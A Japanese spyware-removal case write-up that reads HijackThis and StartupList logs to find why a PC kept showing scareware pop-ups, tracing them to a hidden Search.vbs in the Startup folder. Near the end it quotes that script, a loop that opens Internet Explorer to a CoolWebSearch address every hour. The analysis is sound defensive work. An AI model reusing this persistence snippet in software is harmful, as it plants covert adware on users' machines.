POWERED by 
四つ目、質問掲示板の#6324、ちわ子さんの例です。
「あなたのセキュリティは危ない」といった脅しが定期的に出て、クリックすると「www.browsercleanser.com」に飛ばされるということで、最初はてっきりInternetWasherの亜種だと思いこんでいました。ところがHijackThisのログにはそれらしきものが出てこないし、ログに問題が無くなっても症状が治まらない。
結局、StartupListのログを取ってもらった結果、HijackThisのログに現れないスタートアップフォルダに、原因であるSearch.vbsが隠れていたという例です。同時に、Running Processesもきちんとチェックした方が良いという反省の例でもあります。
おそらくGator/GAIN以外ではスタートアップフォルダに原因が発見されたのは初めてではないでしょうか。
なお、サーチエンジンから飛んできてBrowserCleanserの対処法のみを知りたい方はこちらをどうぞ。
2〜3日前から、同じ広告が何度消しても一定時間が経つと出てきて困っております。コチラの対策法を読んで、AD-awareやSpybotなども使ってみましたが削除できませんでした。その広告は、
** STOP!! **
You could be in danger
Your computer keeps records of all your internet surfing and usage activity.
Your computer history can be recovered VERY easily.
You CANNOT clean this history without the proper tools.
** You are at great risk ** Get protected NOW.
>> Click Here <<
という文面のもので>> Click Here <<をクリックすると
http://www.browsercleanser.com/cgi-bin/affiliates/clickthru.cgi?id=pop_int
に飛ばされるといったものです。どうか削除方法をお教え下さい。
いかにもInternetWasherやSystem Soap Proっぽい症状です。また、メッセンジャースパムの疑いもありました(違いましたが)。後で画像も貼ってもらいました。こちらです。
Logfile of HijackThis v1.97.2
Scan saved at 23:13:48, on 2003/10/24
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\system32\NTMETER.EXE
C:\Smdata\ReadSctService.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\Tablet.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\system32\ZoneLabs\minilog.exe
C:\Program Files\NEC\SmartVision\SvSche.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\NsUpdate.exe
C:\Program Files\nectvrc\tvrc.exe
C:\Progra~1\Necmfk\necmfk.exe
C:\PROGRA~1\NORTON~1\navapw32.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\PCGATE Personal\pcgate.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\PSIGUIDE\PChange.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\explorer.exe
C:\Documents and Settings\User\デスクトップ\hijackthis\HijackThis.exe
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {BDF3E430-B101-42AD-A544-FADC6B084872} - c:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - c:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file)
O4 - HKLM\..\Run: [TCSTART] C:\WINDOWS\TCSTART.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [SmartVisionScheduler] C:\Program Files\NEC\SmartVision\SvSche.exe
O4 - HKLM\..\Run: [SiSUSBRG] C:\WINDOWS\SiSUSBrg.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe
O4 - HKLM\..\Run: [NsUpdate] C:\WINDOWS\NsUpdate.exe UPDATE
O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET
O4 - HKLM\..\Run: [NECTVRC] C:\Program Files\nectvrc\tvrc.exe
O4 - HKLM\..\Run: [NECMFK] C:\Progra~1\Necmfk\necmfk.exe
O4 - HKLM\..\Run: [NAV Agent] c:\PROGRA~1\NORTON~1\navapw32.exe
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Global Startup: NTUSER.DAT
O4 - Global Startup: NTUSER.DAT.LOG
O8 - Extra context menu item: ちょこっと 強制リンク - C:\Program Files\c_link113\c_link\c_link.html
O8 - Extra context menu item: リンク 表示 - C:\Program Files\linknimoero05\linknimoero\link.htm
O8 - Extra context menu item: 右サーチ君 exciteウェブ翻訳 和英[訳文と原文を表示] - C:\Program Files\
O8 - Extra context menu item: 右サーチ君 exciteウェブ翻訳 英和[訳文と原文を表示] - C:\Program Files\
O8 - Extra context menu item: 右サーチ君 Google[日本語のページ] - C:\Program Files\
O9 - Extra button: FlashGet (HKLM)
O9 - Extra 'Tools' menuitem: &FlashGet (HKLM)
O9 - Extra button: @C:\Program Files\Messenger\Msgslang.dll,-61144 (HKLM)
O9 - Extra 'Tools' menuitem: @C:\Program Files\Messenger\Msgslang.dll,-61144 (HKLM)
O14 - IERESET.INF: START_PAGE_URL=http://www.nifty.com/
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2003042101/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {CAFEEFAC-0014-0000-0001-ABCDEFFEDCBA} (Java Runtime Environment 1.4.0_01) -
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
この時点で嫌な予感がした…というのは嘘です(笑)
僕の場合は、すべてが解ってから後づけで気が付いたのですが、adultさんは最初からちょっと変だと疑っておられたそうです。
C:\WINDOWS\System32\WScript.exe
WScript.exeは正規のWindowsのアプリケーションで、スクリプトを実行させるものです。これが見つかったからといって悪さをしているとは限らないのですが、確かにあまりHijackThisのログ上で走っているのを見ないプロセスです…と思って過去ログを検索してみたら結構出て来ますね。
どちらにしても「一応要注意」ということは言えます。
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program
Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: (no name) - {BDF3E430-B101-42AD-A544-FADC6B084872} - c:\Program Files\Norton AntiVirus\NavShExt.dll
Acrobat、Spybot、NAVとおなじみのものばかりです。問題なし。
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6}
- c:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file)
3番目は既に「no file」になってますからSpybotによって無害化されてると思われますが、一応削除対象に。
OSがXPですから「O4 - Startup:」と「O4 - Global Startup:」は無視です。
O4 - HKLM\..\Run: [TCSTART] C:\WINDOWS\TCSTART.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [SmartVisionScheduler] C:\Program Files\NEC\SmartVision\SvSche.exe
O4 - HKLM\..\Run: [SiSUSBRG] C:\WINDOWS\SiSUSBrg.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE
/SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe
O4 - HKLM\..\Run: [NsUpdate] C:\WINDOWS\NsUpdate.exe UPDATE
O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET
O4 - HKLM\..\Run: [NECTVRC] C:\Program Files\nectvrc\tvrc.exe
O4 - HKLM\..\Run: [NECMFK] C:\Progra~1\Necmfk\necmfk.exe
O4 - HKLM\..\Run: [NAV Agent] c:\PROGRA~1\NORTON~1\navapw32.exe
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
最初の、
O4 - HKLM\..\Run: [NsUpdate] C:\WINDOWS\NsUpdate.exe UPDATE
はアダルト系のダイヤラですが、その他にポップアップを出す様なエントリが見つかりません。「おかしい、特に問題のあるエントリが無い…」と思いました。同時に「ならO16あたりに何かあるはず。」とも予想しました。
NECのPCであること、アンチウィルスソフトはちょっと古いバージョンのNortonだということは解るのですが。
O8、O9とも大したことじゃないので飛ばします。インストールされているアプリのいくつかが確認できます。
O14 - IERESET.INF: START_PAGE_URL=http://www.nifty.com/
NiftyのURLですから問題無し。
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2003042101/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {CAFEEFAC-0014-0000-0001-ABCDEFFEDCBA} (Java Runtime Environment 1.4.0_01) -
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
さて、O16は…と見てみても問題ありそうにありません。ウィルスバスターとJavaのランタイム、Flashのエントリです。大丈夫だとは思いますが、O16は「疑わしきは消す」でいけるので二番目のJava Runtimeは削除してみることにします。
結局ポップアップを出すようなめぼしいエントリが見つかりませんでした。一応下記の指示を出しました。
HijackThis以外のウィンドウを全て閉じ、HijackThisから下記エントリを削除後、PCを再起動して下さい。
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file)
O16 - DPF: {CAFEEFAC-0014-0000-0001-ABCDEFFEDCBA} (Java Runtime Environment 1.4.0_01) -
でもやはりポップアップは納まりません。それではということで、StartupListのログを取ってもらいました。
StartupList report, 2003/10/25, 4:17:57
StartupList version: 1.52
Started from : C:\Documents and Settings\User\デスクトップ\hijackthis\HijackThis.EXE
Detected: Windows XP SP1 (WinNT 5.01.2600)
Detected: Internet Explorer v6.00 SP1 (6.00.2800.1106)
* Using default options
==================================================
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\system32\NTMETER.EXE
C:\Smdata\ReadSctService.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\Tablet.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\system32\ZoneLabs\minilog.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\NEC\SmartVision\SvSche.exe
C:\Program Files\nectvrc\tvrc.exe
C:\Progra~1\Necmfk\necmfk.exe
C:\PROGRA~1\NORTON~1\navapw32.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\PCGATE Personal\pcgate.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\PSIGUIDE\PChange.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\User\デスクトップ\hijackthis\HijackThis.exe
--------------------------------------------------
Listing of startup folders:
Shell folders Common Startup:
[C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ]
Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
PCGATE Personal.lnk = C:\Program Files\PCGATE Personal\pcgate.exe
Search.vbs
ドット・ゲートサービス スタートツール.lnk = C:\Program Files\PSIGUIDE\PChange.exe
--------------------------------------------------
Checking Windows NT UserInit:
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = C:\WINDOWS\system32\userinit.exe,
--------------------------------------------------
Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
TCSTART = C:\WINDOWS\TCSTART.EXE
StorageGuard = "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
SmartVisionScheduler = C:\Program Files\NEC\SmartVision\SvSche.exe
SiSUSBRG = C:\WINDOWS\SiSUSBrg.exe
PHIME2002ASync = C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
PHIME2002A = C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
PCTVOICE = pctspk.exe
NMFTASK = NMFTASK.EXE /RESET
NECTVRC = C:\Program Files\nectvrc\tvrc.exe
NECMFK = C:\Progra~1\Necmfk\necmfk.exe
NAV Agent = c:\PROGRA~1\NORTON~1\navapw32.exe
MSPY2002 = C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
IMJPMIG8.1 = C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
imjpmig = C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
IMEKRMIG6.1 = C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
--------------------------------------------------
Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
MSMSGS = "C:\Program Files\Messenger\msmsgs.exe" /background
ctfmon.exe = C:\WINDOWS\System32\ctfmon.exe
--------------------------------------------------
Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:
Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*
Shell & screensaver key from Registry:
Shell=Explorer.exe
SCRNSAVE.EXE=C:\WINDOWS\aiful.scr
drivers=*Registry value not found*
Policies Shell key:
HKCU\..\Policies: Shell=*Registry key not found*
HKLM\..\Policies: Shell=*Registry value not found*
--------------------------------------------------
Enumerating Browser Helper Objects:
(no name) - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
- {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}
(no name) - C:\PROGRA~1\SPYBOT~1\SDHelper.dll - {53707962-6F74-2D53-2644-206D7942484F}
(no name) - c:\Program Files\Norton AntiVirus\NavShExt.dll - {BDF3E430-B101-42AD-A544-FADC6B084872}
--------------------------------------------------
Enumerating Task Scheduler jobs:
20031025857.job
Norton AntiVirus - コンピュータをスキャン.job
Symantec NetDetect.job
--------------------------------------------------
Enumerating Download Program Files:
[ウイルスバスター On-Line Scan]
InProcServer32 = C:\WINDOWS\DOWNLO~1\xscan53.ocx
CODEBASE = http://a840.g.akamai.net/7/840/537/2003042101/housecall.antivirus.com/housecall/xscan53.cab
[{CAFEEFAC-0014-0000-0001-ABCDEFFEDCBA}]
[Shockwave Flash Object]
InProcServer32 = C:\WINDOWS\System32\macromed\flash\Flash.ocx
CODEBASE = http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
--------------------------------------------------
Enumerating ShellServiceObjectDelayLoad items:
PostBootReminder: C:\WINDOWS\system32\SHELL32.dll
CDBurn: C:\WINDOWS\system32\SHELL32.dll
WebCheck: C:\WINDOWS\System32\webcheck.dll
SysTray: C:\WINDOWS\System32\stobject.dll
--------------------------------------------------
End of report, 5,972 bytes
Report generated in 0.141 seconds
何をおいても、Win2000、XPの場合注目するのはスタートアップフォルダの部分です。HijackThisのログに出てこない自動起動エントリですから。
Listing of startup folders:
Shell folders Common Startup:
[C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ]
Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
PCGATE Personal.lnk = C:\Program Files\PCGATE Personal\pcgate.exe
Search.vbs
ドット・ゲートサービス スタートツール.lnk = C:\Program Files\PSIGUIDE\PChange.exe
見てみると…vbsファイルがあります。ファイル名はSearchともっともらしいですが、こんなところにvbsファイルが入ってることは通常ありません。怪しい…
あとadultさんが注目されたのはこちらです。ポップアップが定期的に出てくるならスケジューラが怪しいのではないか。
Enumerating Task Scheduler jobs:
20031025857.job
Norton AntiVirus - コンピュータをスキャン.job
Symantec NetDetect.job
Norton関係はもちろん問題ないですが、確かにこの「20031025857.job」は怪しい。
まず「20031025857.job」の方の検証です。コントロールパネルの「タスク」を開くと一覧が出るので、これを右クリックしてプロパティを出すとある程度素性が解ります。実際にはNECのPCにプレインストールされているSmartVisionのTV番組表を取得するためのものと判明しました。結果としてはこれは問題ないエントリということになります。
次は「Search.vbs」。ファイルを送ってもらってエディタで開いてみると、中身はこうなっていました。
While 1
WScript.Sleep(3600000)
Set SearchWWW =
CreateObject("InternetExplorer.Application")
SearchWWW.Navigate "http://www.searchwww.com/vbs.html"
WEnd
つまり、3,600,000ミリ秒(=60分)ごとにwww.searchwww.com/vbs.htmlにアクセスするという命令をWScript.exeに実行させているファイルです。
つまり、こいつが赤いポップアップを出す犯人でした。
ちわ子さんは、この「http://www.searchwww.com」に飛ぶと前の赤い広告が出ることを確認されました。これで絶対確実です。
そこで、スタートアップフォルダからこの「Search.vbs」を削除したところ、見事ポップアップがおさまりました。よかったよかった。
この「www.searchwww.com」は明らかにCoolWebSearchのアドレスなので、念のため最後にCoolWebShredderをやってもらいました。
この「Search.vbs」ついてはSpywareInfoでもいくつか例が報告されています。日本語OSの場合、HijackThisのバグが原因で必要以上に解決に時間がかかったという面はありますが、何より質問者のちわ子さんの対応が素早く的確だったために見事解決することができました。